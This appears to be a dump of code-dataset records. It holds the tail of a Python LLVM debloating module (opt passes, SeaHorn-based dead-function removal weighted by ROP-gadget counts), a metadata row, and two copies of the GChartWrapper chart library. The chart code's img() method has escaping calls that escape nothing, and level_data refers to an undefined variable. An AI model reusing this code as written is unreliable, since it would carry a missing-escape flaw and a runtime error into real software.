FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
import sys
import os
import tempfile
import shutil
from . import config
from . import driver
from . import interface as inter
from . import stringbuffer
from . import pool
from . import utils
def interface(input_file, output_file, wrt):
""" computing the interfaces.
"""
args = ['-Pinterface2', '-Pinterface2-output', output_file]
args += driver.all_args('-Pinterface2-entry', wrt)
return driver.previrt(input_file, '/dev/null', args)
def specialize(input_file, output_file, rewrite_file, interfaces):
""" inter module specialization.
"""
args = ['-Pspecialize']
if not rewrite_file is None:
args += ['-Pspecialize-output', rewrite_file]
args += driver.all_args('-Pspecialize-input', interfaces)
if output_file is None:
output_file = '/dev/null'
return driver.previrt(input_file, output_file, args)
def rewrite(input_file, output_file, rewrites, output=None):
""" inter module rewriting
"""
args = ['-Prewrite'] + driver.all_args('-Prewrite-input', rewrites)
return driver.previrt_progress(input_file, output_file, args, output)
def internalize(input_file, output_file, interfaces, whitelist):
""" marks unused symbols as internal/hidden
"""
args = ['-Poccam'] + driver.all_args('-Poccam-input', interfaces)
if whitelist is not None:
args = args + ['-Pkeep-external', whitelist]
return driver.previrt_progress(input_file, output_file, args)
def strip(input_file, output_file):
""" strips unused symbols
"""
args = [input_file, '-o', output_file]
args += ['-strip', '-globaldce', '-globalopt', '-strip-dead-prototypes']
return driver.run('opt', args)
def devirt(input_file, output_file):
""" resolve indirect function calls
"""
args = ['-devirt-ta',
# XXX: this one is not, in general, sound
#'-calltarget-ignore-external',
'-inline']
retcode = driver.previrt_progress(input_file, output_file, args)
if retcode != 0:
return retcode
#FIXME: previrt_progress returns 0 in cases where --devirt-ta crashes.
#Here we check that the output_file exists
if not os.path.isfile(output_file):
#Some return code different from zero
return 3
else:
return retcode
def profile(input_file, output_file):
""" count number of instructions, functions, memory accesses, etc.
"""
args = ['-Pprofiler']
args += ['-profile-outfile={0}'.format(output_file)]
return driver.previrt(input_file, '/dev/null', args)
def peval(input_file, output_file, use_devirt, use_llpe, use_ipdse, log=None):
""" intra module previrtualization
"""
opt = tempfile.NamedTemporaryFile(suffix='.bc', delete=False)
done = tempfile.NamedTemporaryFile(suffix='.bc', delete=False)
tmp = tempfile.NamedTemporaryFile(suffix='.bc', delete=False)
opt.close()
done.close()
tmp.close()
#XXX: Optimize using standard llvm transformations before any other pass.
#Otherwise, these passes will not be very effective.
retcode = optimize(input_file, done.name)
if retcode != 0:
sys.stderr.write("ERROR: intra module optimization failed!\n")
shutil.copy(input_file, output_file)
return retcode
else:
sys.stderr.write("\tintra module optimization finished succesfully\n")
if use_devirt is not None:
retcode = devirt(done.name, tmp.name)
if retcode != 0:
sys.stderr.write("ERROR: resolution of indirect calls failed!\n")
shutil.copy(done.name, output_file)
return retcode
sys.stderr.write("\tresolved indirect calls finished succesfully\n")
shutil.copy(tmp.name, done.name)
if use_llpe is not None:
llpe_libs = []
for lib in config.get_llpelibs():
llpe_libs.append('-load={0}'.format(lib))
args = llpe_libs + ['-loop-simplify', '-lcssa', \
'-llpe', '-llpe-omit-checks', '-llpe-single-threaded', \
done.name, '-o=%s' % tmp.name]
retcode = driver.run('opt', args)
if retcode != 0:
sys.stderr.write("ERROR: llpe failed!\n")
shutil.copy(done.name, output_file)
#FIXME: unlink files
return retcode
else:
sys.stderr.write("\tllpe finished succesfully\n")
shutil.copy(tmp.name, done.name)
if use_ipdse is not None:
##lower global initializers to store's in main (improve precision of sccp)
passes = ['-lower-gv-init']
##dead store elimination (improve precision of sccp)
passes += ['-memory-ssa', '-Pmem-ssa-local-mod','-Pmem-ssa-split-fields',
'-mem2reg', '-ip-dse', '-strip-memory-ssa-inst']
##perform sccp
passes += ['-Psccp']
##cleanup after sccp
passes += ['-dce', '-globaldce']
retcode = driver.previrt(done.name, tmp.name, passes)
if retcode != 0:
sys.stderr.write("ERROR: ipdse failed!\n")
shutil.copy(done.name, output_file)
#FIXME: unlink files
return retcode
else:
sys.stderr.write("\tipdse finished succesfully\n")
shutil.copy(tmp.name, done.name)
out = ['']
iteration = 0
while True:
iteration += 1
if iteration > 1 or \
(use_llpe is not None or use_ipdse is not None):
# optimize using standard llvm transformations
retcode = optimize(done.name, opt.name)
if retcode != 0:
sys.stderr.write("ERROR: intra-module optimization failed!\n")
break;
else:
sys.stderr.write("\tintra module optimization finished succesfully\n")
else:
shutil.copy(done.name, opt.name)
# inlining using policies
passes = ['-Ppeval']
progress = driver.previrt_progress(opt.name, done.name, passes, output=out)
sys.stderr.write("\tintra-module specialization finished\n")
if progress:
if log is not None:
log.write(out[0])
else:
shutil.copy(opt.name, done.name)
break
shutil.copy(done.name, output_file)
try:
os.unlink(done.name)
os.unlink(opt.name)
os.unlink(tmp.name)
except OSError:
pass
return retcode
def optimize(input_file, output_file):
""" run opt -O3
"""
args = ['-disable-simplify-libcalls', input_file, '-o', output_file, '-O3']
return driver.run('opt', args)
def constrain_program_args(input_file, output_file, cnstrs, filename=None):
""" constrain the program arguments.
"""
if filename is None:
cnstr_file = tempfile.NamedTemporaryFile(delete=False)
cnstr_file.close()
cnstr_file = cnstr_file.name
else:
cnstr_file = filename
f = open(cnstr_file, 'w')
(argc, argv) = cnstrs
f.write('{0}\n'.format(argc))
index = 0
for x in argv:
f.write('{0} {1}\n'.format(index, x))
index += 1
f.close()
args = ['-Pconstraints', '-Pconstraints-input', cnstr_file]
driver.previrt(input_file, output_file, args)
if filename is None:
os.unlink(cnstr_file)
def specialize_program_args(input_file, output_file, args, filename=None, name=None):
""" fix the program arguments.
"""
if filename is None:
arg_file = tempfile.NamedTemporaryFile(delete=False)
arg_file.close()
arg_file = arg_file.name
else:
arg_file = filename
f = open(arg_file, 'w')
for x in args:
f.write(x + '\n')
f.close()
extra_args = []
if not name is None:
extra_args = ['-Parguments-name', name]
args = ['-Parguments', '-Parguments-input', arg_file] + extra_args
driver.previrt(input_file, output_file, args)
if filename is None:
os.unlink(arg_file)
def deep(libs, ifaces):
""" compute interfaces across modules.
"""
tf = tempfile.NamedTemporaryFile(suffix='.iface', delete=False)
tf.close()
iface = inter.parseInterface(ifaces[0])
for i in ifaces[1:]:
inter.joinInterfaces(iface, inter.parseInterface(i))
inter.writeInterface(iface, tf.name)
progress = True
while progress:
progress = False
for l in libs:
interface(l, tf.name, [tf.name])
x = inter.parseInterface(tf.name)
progress = inter.joinInterfaces(iface, x) or progress
inter.writeInterface(iface, tf.name)
os.unlink(tf.name)
return iface
def run_seahorn(sea_cmd, input_file, fname, is_loop_free, cpu, mem):
""" running SeaHorn
"""
def check_status(output_str):
if "unsat" in output_str: return True
elif "sat" in output_str: return False
else: return None
# 1. Instrument the program with assertions
sea_infile = tempfile.NamedTemporaryFile(suffix='.bc', delete=False)
sea_infile.close()
args = ['--Padd-verifier-calls',
'--Padd-verifier-call-in-function={0}'.format(fname)]
driver.previrt(input_file, sea_infile.name, args)
# 2. Run SeaHorn
sea_args = [ '--strip-extern'
, '--enable-indvar'
, '--enable-loop-idiom'
, '--symbolize-constant-loop-bounds'
, '--unfold-loops-for-dsa'
, '--simplify-pointer-loops'
, '--horn-sea-dsa-local-mod'
, '--horn-sea-dsa-split'
, '--dsa=sea-cs'
, '--cpu={0}'.format(cpu)
, '--mem={0}'.format(mem)]
if is_loop_free:
# the bound shouldn't affect for proving unreachability of the
# function but we need a global bound for all loops.
sea_args = ['bpf', '--bmc=mono', '--bound=3'] + \
sea_args + \
[ '--horn-bv-global-constraints=true'
, '--horn-bv-singleton-aliases=true'
, '--horn-bv-ignore-calloc=false'
, '--horn-at-most-one-predecessor']
sys.stderr.write('\tRunning SeaHorn with BMC engine on {0} ...\n'.format(fname))
else:
sea_args = ['pf'] + \
sea_args + \
[ '--horn-global-constraints=true'
, '--horn-singleton-aliases=true'
, '--horn-ignore-calloc=false'
, '--crab', '--crab-dom=int']
sys.stderr.write('\tRunning SeaHorn with Spacer+AI engine on {0} ...\n'.format(fname))
sea_args = sea_args + [sea_infile.name]
sb = stringbuffer.StringBuffer()
retcode= driver.run(sea_cmd, sea_args, sb, False)
status = check_status(str(sb))
if retcode == 0 and status:
# 3. If SeaHorn proved unreachability of the function then we
# add assume(false) at the entry of that function.
sys.stderr.write('SeaHorn proved unreachability of {0}!\n'.format(fname))
sea_outfile = tempfile.NamedTemporaryFile(suffix='.bc', delete=False)
sea_outfile.close()
args = ['--Preplace-verifier-calls-with-unreachable']
driver.previrt_progress(sea_infile.name, sea_outfile.name, args)
# 4. And, we run the optimized to remove that function
sea_opt_outfile = tempfile.NamedTemporaryFile(suffix='.bc', delete=False)
sea_opt_outfile.close()
optimize(sea_outfile.name, sea_opt_outfile.name)
return sea_opt_outfile.name
else:
sys.stderr.write('\tSeaHorn could not prove unreachability of {0}.\n'.format(fname))
if retcode <> 0:
sys.stderr.write('\t\tPossibly timeout or memory limits reached\n')
elif not status:
sys.stderr.write('\t\tSeaHorn got a counterexample\n')
return input_file
def precise_dce(input_file, ropfile, output_file):
""" use SeaHorn model-checker to remove dead functions
"""
sea_cmd = utils.get_seahorn()
if sea_cmd is None:
sys.stderr.write('SeaHorn not found. Aborting precise dce ...')
shutil.copy(input_file, output_file)
return False
cost_benefit_out = tempfile.NamedTemporaryFile(delete=False)
args = ['--Pcost-benefit-cg']
args += ['--Pbenefits-filename={0}'.format(ropfile)]
args += ['--Pcost-benefit-output={0}'.format(cost_benefit_out.name)]
driver.previrt(input_file, '/dev/null', args)
####
## TODO: make these parameters user-definable:
####
benefit_threshold = 20 ## number of ROP gadgets
cost_threshold = 3 ## number of loops
timeout = 120 ## SeaHorn timeout in seconds
memlimit = 4096 ## SeaHorn memory limit in MB
seahorn_queries = []
for line in cost_benefit_out:
tokens = line.split()
# Expected format of each token: FUNCTION BENEFIT COST
# where FUNCTION is a string, BENEFIT is an integer, and COST is an integer
if len(tokens) < 3:
sys.stderr.write('ERROR: unexpected format of {0}\n'.format(cost_benefit_out.name))
return False
fname = tokens[0]
fbenefit= int(tokens[1])
fcost = int(tokens[2])
if fbenefit >= benefit_threshold and fcost <= cost_threshold:
seahorn_queries.extend([(fname, fcost == 0)])
cost_benefit_out.close()
if seahorn_queries == []:
print "No queries for SeaHorn ..."
#####
## TODO: run SeaHorn instances in parallel
#####
change = False
curfile = input_file
for (fname, is_loop_free) in seahorn_queries:
if fname == 'main' or \
fname.startswith('devirt') or \
fname.startswith('seahorn'):
continue
nextfile = run_seahorn(sea_cmd, curfile, fname, is_loop_free, timeout, memlimit)
change = change | (curfile <> nextfile)
curfile = nextfile
shutil.copy(curfile, output_file)
return change
| 127 | 0 | 31 |
a371f4fac06296e177e959b547db9d31e5eb8257 | 24,893 | py | Python | GChartWrapper/GChart.py | dhilipsiva/google-chartwrapper | 3769aecbef6c83b6cd93ee72ece478ffe433ac57 | [
"BSD-3-Clause"
] | null | null | null | GChartWrapper/GChart.py | dhilipsiva/google-chartwrapper | 3769aecbef6c83b6cd93ee72ece478ffe433ac57 | [
"BSD-3-Clause"
] | 1 | 2019-01-14T05:09:15.000Z | 2019-01-14T05:09:15.000Z | GChartWrapper/GChart.py | dhilipsiva/google-chartwrapper | 3769aecbef6c83b6cd93ee72ece478ffe433ac57 | [
"BSD-3-Clause"
] | null | null | null | # -*- coding: utf-8 -*-
################################################################################
# GChartWrapper - v0.8
# Copyright (C) 2009 Justin Quick <justquick@gmail.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3 as published
# by the Free Software Foundation.
#
# Thanks to anyone who does anything for this project.
# If you have even the smallest revision, please email me at above address.
################################################################################
"""
GChartWrapper - Google Chart API Wrapper
The wrapper can render the URL of the Google chart based on your parameters.
With the chart you can render an HTML img tag to insert into webpages on the fly,
show it directly in a webbrowser, or save the chart PNG to disk. New versions
can generate PIL PngImage instances.
Example
>>> G = GChart('lc',['simpleisbetterthancomplexcomplexisbetterthancomplicated'])
>>> G.title('The Zen of Python','00cc00',36)
>>> G.color('00cc00')
>>> str(G)
'http://chart.apis.google.com/chart?
chd=e:simpleisbetterthancomplexcomplexisbetterthancomplicated
&chs=300x150
&cht=lc
&chtt=The+Zen+of+Python'
>>> G.image() # PIL instance
<PngImagePlugin.PngImageFile instance at ...>
>>> 1#G.show() # Webbrowser open
True
>>> G.save('tmp.png') # Save to disk
'tmp.png'
See tests.py for unit test and other examples
"""
from GChartWrapper.constants import *
from GChartWrapper.encoding import Encoder
from copy import copy
def lookup_color(color):
    """
    Returns the hex color for any valid css color name
    >>> lookup_color('aliceblue')
    'F0F8FF'
    """
    if color is None:
        return None
    lowered = color.lower()
    # Unknown names fall through unchanged (already-hex values pass here).
    return COLOR_MAP.get(lowered, lowered)
def color_args(args, *indexes):
    """
    Color a list of arguments on particular indexes
    >>> c = color_args([None,'blue'], 1)
    >>> c.next()
    None
    >>> c.next()
    '0000FF'
    """
    for position, value in enumerate(args):
        yield lookup_color(value) if position in indexes else value
class Axes(dict):
    """
    Axes attribute dictionary storage
    Use this class via GChart(...).axes
    Methods are taken one at a time, like so:
    >>> G = GChart()
    >>> G.axes.type('xy')
    {}
    >>> G.axes.label(1,'Label1') # X Axis
    {}
    >>> G.axes.label(2,'Label2') # Y Axis
    {}
    """
    # NOTE(review): self.data (per-option lists) and self.parent (the owning
    # GChart, returned for chaining) are initialized outside this class --
    # presumably by GChart; confirm in its constructor.
    def tick(self, index, length):
        """
        Add tick marks in order of axes by width
        APIPARAM: chxtc <axis index>,<length of tick mark>
        """
        assert int(length) <= 25, 'Width cannot be more than 25'
        self.data['ticks'].append('%s,%d'%(index,length))
        return self.parent
    def type(self, atype):
        """
        Define the type of axes you wish to use
        atype must be one of x,t,y,r
        APIPARAM: chxt
        """
        for char in atype:
            assert char in 'xtyr', 'Invalid axes type: %s'%char
        # Accept both 'xy' and 'x,y'; the API wants comma-separated.
        if not ',' in atype:
            atype = ','.join(atype)
        self['chxt'] = atype
        return self.parent
    # Calling the Axes object directly is shorthand for type().
    __call__ = type
    def label(self, index, *args):
        """
        Label each axes one at a time
        args are of the form <label 1>,...,<label n>
        APIPARAM: chxl
        """
        # None arguments render as empty labels (str(None) stripped below).
        self.data['labels'].append(
            str('%s:|%s'%(index, '|'.join(map(str,args)) )).replace('None','')
        )
        return self.parent
    def position(self, index, *args):
        """
        Set the label position of each axis, one at a time
        args are of the form <label position 1>,...,<label position n>
        APIPARAM: chxp
        """
        self.data['positions'].append(
            str('%s,%s'%(index, ','.join(map(str,args)))).replace('None','')
        )
        return self.parent
    def range(self, index, *args):
        """
        Set the range of each axis, one at a time
        args are of the form <start of range>,<end of range>,<interval>
        APIPARAM: chxr
        """
        self.data['ranges'].append('%s,%s'%(index,
            ','.join(map(smart_str, args))))
        return self.parent
    def style(self, index, *args):
        """
        Add style to your axis, one at a time
        args are of the form::
            <axis color>,
            <font size>,
            <alignment>,
            <drawing control>,
            <tick mark color>
        APIPARAM: chxs
        """
        # First positional arg is a color name; translate it to hex.
        args = color_args(args, 0)
        self.data['styles'].append(
            ','.join([str(index)]+list(map(str,args)))
        )
        return self.parent
    def render(self):
        """Render the axes data into the dict data"""
        # Maps e.g. 'labels' -> 'chxl', 'ranges' -> 'chxr' via the first
        # letter of the option name; 'ticks' is the one irregular key.
        for opt,values in self.data.items():
            if opt == 'ticks':
                self['chxtc'] = '|'.join(values)
            else:
                self['chx%s'%opt[0]] = '|'.join(values)
        return self
class GChart(dict):
"""Main chart class
Chart type must be valid for cht parameter
Dataset can be any python iterable and be multi dimensional
Kwargs will be put into chart API params if valid"""
@classmethod
def fromurl(cls, qs):
    """
    Reverse a chart URL or dict into a GChart instance
    >>> G = GChart.fromurl('http://chart.apis.google.com/chart?...')
    >>> G
    <GChartWrapper.GChart instance at...>
    >>> G.image().save('chart.jpg','JPEG')
    """
    # Strings are parsed as URLs: everything after '?' is a query string.
    if not isinstance(qs, dict):
        qs = dict(parse_qsl(qs[qs.index('?') + 1:]))
    return cls(**qs)
###################
# Callables
###################
def map(self, geo, country_codes):
"""
Creates a map of the defined geography with the given country/state codes
Geography choices are africa, asia, europe, middle_east, south_america, and world
ISO country codes can be found at http://code.google.com/apis/chart/isocodes.html
US state codes can be found at http://code.google.com/apis/chart/statecodes.html
APIPARAMS: chtm & chld
"""
assert geo in GEO, 'Geograpic area %s not recognized'%geo
self._geo = geo
self._ld = country_codes
return self
def level_data(self, *args):
"""
Just used in QRCode for the moment
args are error_correction,margin_size
APIPARAM: chld
"""
assert args[0].lower() in 'lmqh', 'Unknown EC level %s'%level
self['chld'] = '%s|%s'%args
return self
def bar(self, *args):
"""
For bar charts, specify bar thickness and spacing with the args
args are <bar width>,<space between bars>,<space between groups>
bar width can be relative or absolute, see the official doc
APIPARAM: chbh
"""
self['chbh'] = ','.join(map(str,args))
return self
def encoding(self, arg):
"""
Specifies the encoding to be used for the Encoder
Must be one of 'simple','text', or 'extended'
"""
self._encoding = arg
return self
def output_encoding(self, encoding):
"""
Output encoding to use for QRCode encoding
Must be one of 'Shift_JIS','UTF-8', or 'ISO-8859-1'
APIPARAM: choe
"""
assert encoding in ('Shift_JIS','UTF-8','ISO-8859-1'),\
'Unknown encoding %s'%encoding
self['choe'] = encoding
return self
def scale(self, *args):
"""
Scales the data down to the given size
args must be of the form::
<data set 1 minimum value>,
<data set 1 maximum value>,
<data set n minimum value>,
<data set n maximum value>
will only work with text encoding!
APIPARAM: chds
"""
self._scale = [','.join(map(smart_str, args))]
return self
def dataset(self, data, series=''):
"""
Update the chart's dataset, can be two dimensional or contain string data
"""
self._dataset = data
self._series = series
return self
def marker(self, *args):
"""
Defines markers one at a time for your graph
args are of the form::
<marker type>,
<color>,
<data set index>,
<data point>,
<size>,
<priority>
see the official developers doc for the complete spec
APIPARAM: chm
"""
if len(args[0]) == 1:
assert args[0] in MARKERS, 'Invalid marker type: %s'%args[0]
assert len(args) <= 6, 'Incorrect arguments %s'%str(args)
args = color_args(args, 1)
self.markers.append(','.join(map(str,args)) )
return self
def margin(self, left, right, top, bottom, lwidth=0, lheight=0):
"""
Set margins for chart area
args are of the form::
<left margin>,
<right margin>,
<top margin>,
<bottom margin>|
<legend width>,
<legend height>
APIPARAM: chma
"""
self['chma'] = '%d,%d,%d,%d' % (left, right, top, bottom)
if lwidth or lheight:
self['chma'] += '|%d,%d' % (lwidth, lheight)
return self
def line(self, *args):
"""
Called one at a time for each dataset
args are of the form::
<data set n line thickness>,
<length of line segment>,
<length of blank segment>
APIPARAM: chls
"""
self.lines.append(','.join(['%.1f'%x for x in map(float,args)]))
return self
def fill(self, *args):
"""
Apply a solid fill to your chart
args are of the form <fill type>,<fill style>,...
fill type must be one of c,bg,a
fill style must be one of s,lg,ls
the rest of the args refer to the particular style
APIPARAM: chf
"""
a,b = args[:2]
assert a in ('c','bg','a'), 'Fill type must be bg/c/a not %s'%a
assert b in ('s','lg','ls'), 'Fill style must be s/lg/ls not %s'%b
if len(args) == 3:
args = color_args(args, 2)
else:
args = color_args(args, 3,5)
self.fills.append(','.join(map(str,args)))
return self
def grid(self, *args):
"""
Apply a grid to your chart
args are of the form::
<x axis step size>,
<y axis step size>,
<length of line segment>,
<length of blank segment>
<x offset>,
<y offset>
APIPARAM: chg
"""
grids = map(str,map(float,args))
self['chg'] = ','.join(grids).replace('None','')
return self
def color(self, *args):
"""
Add a color for each dataset
args are of the form <color 1>,...<color n>
APIPARAM: chco
"""
args = color_args(args, *range(len(args)))
self['chco'] = ','.join(args)
return self
def type(self, type):
"""
Set the chart type, either Google API type or regular name
APIPARAM: cht
"""
self['cht'] = self.check_type(str(type))
return self
def label(self, *args):
"""
Add a simple label to your chart
call each time for each dataset
APIPARAM: chl
"""
if self['cht'] == 'qr':
self['chl'] = ''.join(map(str,args))
else:
self['chl'] = '|'.join(map(str,args))
return self
def legend(self, *args):
"""
Add a legend to your chart
call each time for each dataset
APIPARAM: chdl
"""
self['chdl'] = '|'.join(args)
return self
def legend_pos(self, pos):
"""
Define a position for your legend to occupy
APIPARAM: chdlp
"""
assert pos in LEGEND_POSITIONS, 'Unknown legend position: %s'%pos
self['chdlp'] = str(pos)
return self
def title(self, title, *args):
"""
Add a title to your chart
args are optional style params of the form <color>,<font size>
APIPARAMS: chtt,chts
"""
self['chtt'] = title
if args:
args = color_args(args, 0)
self['chts'] = ','.join(map(str,args))
return self
def size(self,*args):
"""
Set the size of the chart, args are width,height and can be tuple
APIPARAM: chs
"""
if len(args) == 2:
x,y = map(int,args)
else:
x,y = map(int,args[0])
self.check_size(x,y)
self['chs'] = '%dx%d'%(x,y)
return self
def orientation(self, angle):
"""
Set the chart dataset orientation
angle is <angle in radians>
APIPARAM: chp
"""
self['chp'] = '%f'%angle
return self
position = orientation
def render(self):
"""
Renders the chart context and axes into the dict data
"""
self.update(self.axes.render())
encoder = Encoder(self._encoding, None, self._series)
if not 'chs' in self:
self['chs'] = '300x150'
else:
size = self['chs'].split('x')
assert len(size) == 2, 'Invalid size, must be in the format WxH'
self.check_size(*map(int,size))
assert 'cht' in self, 'No chart type defined, use type method'
self['cht'] = self.check_type(self['cht'])
if ('any' in dir(self._dataset) and self._dataset.any()) or self._dataset:
self['chd'] = encoder.encode(self._dataset)
elif not 'choe' in self:
assert 'chd' in self, 'You must have a dataset, or use chd'
if self._scale:
assert self['chd'].startswith('t'),\
'You must use text encoding with chds'
self['chds'] = ','.join(self._scale)
if self._geo and self._ld:
self['chtm'] = self._geo
self['chld'] = self._ld
if self.lines:
self['chls'] = '|'.join(self.lines)
if self.markers:
self['chm'] = '|'.join(self.markers)
if self.fills:
self['chf'] = '|'.join(self.fills)
###################
# Checks
###################
def check_size(self,x,y):
"""
Make sure the chart size fits the standards
"""
assert x <= 1000, 'Width larger than 1,000'
assert y <= 1000, 'Height larger than 1,000'
assert x*y <= 300000, 'Resolution larger than 300,000'
def check_type(self, type):
"""Check to see if the type is either in TYPES or fits type name
Returns proper type
"""
if type in TYPES:
return type
tdict = dict(zip(TYPES,TYPES))
tdict.update({
'line': 'lc',
'bar': 'bvs',
'pie': 'p',
'venn': 'v',
'scater': 's',
'radar': 'r',
'meter': 'gom',
})
assert type in tdict, 'Invalid chart type: %s'%type
return tdict[type]
#####################
# Convience Functions
#####################
def getname(self):
"""
Gets the name of the chart, if it exists
"""
return self.get('chtt','')
def getdata(self):
"""
Returns the decoded dataset from chd param
"""
#XXX: Why again? not even sure decode works well
return Encoder(self._encoding).decode(self['chd'])
@property
def url(self):
"""
Returns the rendered URL of the chart
"""
self.render()
return self._apiurl + '&'.join(self._parts()).replace(' ','+')
def show(self, *args, **kwargs):
"""
Shows the chart URL in a webbrowser
Other arguments passed to webbrowser.open
"""
from webbrowser import open as webopen
return webopen(str(self), *args, **kwargs)
def save(self, fname=None):
"""
Download the chart from the URL into a filename as a PNG
The filename defaults to the chart title (chtt) if any
"""
if not fname:
fname = self.getname()
assert fname != None, 'You must specify a filename to save to'
if not fname.endswith('.png'):
fname += '.png'
try:
urlretrieve(self.url, fname)
except Exception:
raise IOError('Problem saving %s to file'%fname)
return fname
def img(self, **kwargs):
"""
Returns an XHTML <img/> tag of the chart
kwargs can be other img tag attributes, which are strictly enforced
uses strict escaping on the url, necessary for proper XHTML
"""
safe = 'src="%s" ' % self.url.replace('&','&').replace('<', '<')\
.replace('>', '>').replace('"', '"').replace( "'", ''')
for item in kwargs.items():
if not item[0] in IMGATTRS:
raise AttributeError('Invalid img tag attribute: %s'%item[0])
safe += '%s="%s" '%item
return '<img %s/>'%safe
def urlopen(self):
"""
Grabs readable PNG file pointer
"""
req = Request(str(self))
try:
return urlopen(req)
except HTTPError:
_print('The server couldn\'t fulfill the request.')
except URLError:
_print('We failed to reach a server.')
def image(self):
"""
Returns a PngImageFile instance of the chart
You must have PIL installed for this to work
"""
try:
try:
import Image
except ImportError:
from PIL import Image
except ImportError:
raise ImportError('You must install PIL to fetch image objects')
try:
from cStringIO import StringIO
except ImportError:
from StringIO import StringIO
return Image.open(StringIO(self.urlopen().read()))
def write(self, fp):
"""
Writes out PNG image data in chunks to file pointer fp
fp must support w or wb
"""
urlfp = self.urlopen().fp
while 1:
try:
fp.write(urlfp.next())
except StopIteration:
return
def checksum(self):
"""
Returns the unique SHA1 hexdigest of the chart URL param parts
good for unittesting...
"""
self.render()
return new_sha(''.join(sorted(self._parts()))).hexdigest()
# Now a whole mess of convenience classes
# *for those of us who dont speak API*
########################################
# Now for something completely different
########################################
| 32.328571 | 89 | 0.528582 | # -*- coding: utf-8 -*-
################################################################################
# GChartWrapper - v0.8
# Copyright (C) 2009 Justin Quick <justquick@gmail.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 3 as published
# by the Free Software Foundation.
#
# Thanks to anyone who does anything for this project.
# If you have even the smallest revision, please email me at above address.
################################################################################
"""
GChartWrapper - Google Chart API Wrapper
The wrapper can render the URL of the Google chart based on your parameters.
With the chart you can render an HTML img tag to insert into webpages on the fly,
show it directly in a webbrowser, or save the chart PNG to disk. New versions
can generate PIL PngImage instances.
Example
>>> G = GChart('lc',['simpleisbetterthancomplexcomplexisbetterthancomplicated'])
>>> G.title('The Zen of Python','00cc00',36)
>>> G.color('00cc00')
>>> str(G)
'http://chart.apis.google.com/chart?
chd=e:simpleisbetterthancomplexcomplexisbetterthancomplicated
&chs=300x150
&cht=lc
&chtt=The+Zen+of+Python'
>>> G.image() # PIL instance
<PngImagePlugin.PngImageFile instance at ...>
>>> 1#G.show() # Webbrowser open
True
>>> G.save('tmp.png') # Save to disk
'tmp.png'
See tests.py for unit test and other examples
"""
from GChartWrapper.constants import *
from GChartWrapper.encoding import Encoder
from copy import copy
def lookup_color(color):
    """
    Translate a CSS color name into its hex value via COLOR_MAP.

    Unrecognized values are passed through lower-cased; None stays None.

    >>> lookup_color('aliceblue')
    'F0F8FF'
    """
    if color is None:
        return None
    lowered = color.lower()
    return COLOR_MAP.get(lowered, lowered)
def color_args(args, *indexes):
    """
    Lazily re-emit *args*, translating the values at *indexes* through
    lookup_color so CSS color names become hex strings.

    >>> c = color_args([None,'blue'], 1)
    >>> next(c)
    >>> next(c)
    '0000FF'
    """
    wanted = set(indexes)
    for position, value in enumerate(args):
        yield lookup_color(value) if position in wanted else value
class Axes(dict):
    """
    Container for axis-related chart parameters.

    Obtain an instance via GChart(...).axes; every mutator hands back the
    owning chart so calls can be chained, e.g.::

        G.axes.type('xy')
        G.axes.label(1, 'Label1')   # X axis
        G.axes.label(2, 'Label2')   # Y axis
    """
    def __init__(self, parent):
        # parent is the owning GChart; mutators return it for chaining.
        self.parent = parent
        # Raw per-axis settings, folded into chx* params by render().
        self.data = {'ticks': [], 'labels': [], 'positions': [],
                     'ranges': [], 'styles': []}
        dict.__init__(self)
    def __repr__(self):
        return '<GChart.Axes %s>' % dict(self.items())
    def tick(self, index, length):
        """
        Register a tick-mark length for the axis at *index*.
        APIPARAM: chxtc <axis index>,<length of tick mark>
        """
        assert int(length) <= 25, 'Width cannot be more than 25'
        self.data['ticks'].append('%s,%d' % (index, length))
        return self.parent
    def type(self, atype):
        """
        Choose which axes to draw; *atype* is a string of x/t/y/r codes.
        APIPARAM: chxt
        """
        for code in atype:
            assert code in 'xtyr', 'Invalid axes type: %s' % code
        if ',' not in atype:
            atype = ','.join(atype)
        self['chxt'] = atype
        return self.parent
    __call__ = type
    def label(self, index, *args):
        """
        Attach labels to one axis; *args* are the label strings.
        APIPARAM: chxl
        """
        text = '%s:|%s' % (index, '|'.join(str(a) for a in args))
        # 'None' placeholders collapse to empty label slots.
        self.data['labels'].append(text.replace('None', ''))
        return self.parent
    def position(self, index, *args):
        """
        Set label positions for one axis, one call per axis.
        APIPARAM: chxp
        """
        text = '%s,%s' % (index, ','.join(str(a) for a in args))
        self.data['positions'].append(text.replace('None', ''))
        return self.parent
    def range(self, index, *args):
        """
        Set the numeric range for one axis:
        <start of range>,<end of range>,<interval>
        APIPARAM: chxr
        """
        joined = ','.join(map(smart_str, args))
        self.data['ranges'].append('%s,%s' % (index, joined))
        return self.parent
    def style(self, index, *args):
        """
        Style one axis: <axis color>,<font size>,<alignment>,
        <drawing control>,<tick mark color>
        APIPARAM: chxs
        """
        colored = color_args(args, 0)
        parts = [str(index)] + [str(a) for a in colored]
        self.data['styles'].append(','.join(parts))
        return self.parent
    def render(self):
        """Fold the collected axis data into chx* chart parameters."""
        for name, values in self.data.items():
            key = 'chxtc' if name == 'ticks' else 'chx%s' % name[0]
            self[key] = '|'.join(values)
        return self
class GChart(dict):
"""Main chart class
Chart type must be valid for cht parameter
Dataset can be any python iterable and be multi dimensional
Kwargs will be put into chart API params if valid"""
    def __init__(self, ctype=None, dataset=[], **kwargs):
        """
        Build a chart.

        ctype   -- Google chart type code or friendly name (see check_type)
        dataset -- any (possibly nested) iterable of data values
        kwargs  -- extra URL query-string entries; every key must be a valid
                   chart API parameter (APIPARAMS), except the pseudo-params
                   'series', 'encoding', 'scale' and 'apiurl', which are
                   popped off and stored on the instance instead.
        """
        self._series = kwargs.pop('series',None)
        # Per-call accumulators, rendered into chls/chm/chf by render().
        self.lines,self.fills,self.markers,self.scales = [],[],[],[]
        self._geo,self._ld = '',''
        # NOTE(review): the shared mutable default `dataset=[]` is stored but
        # never mutated in this class, so it is benign; None would be safer.
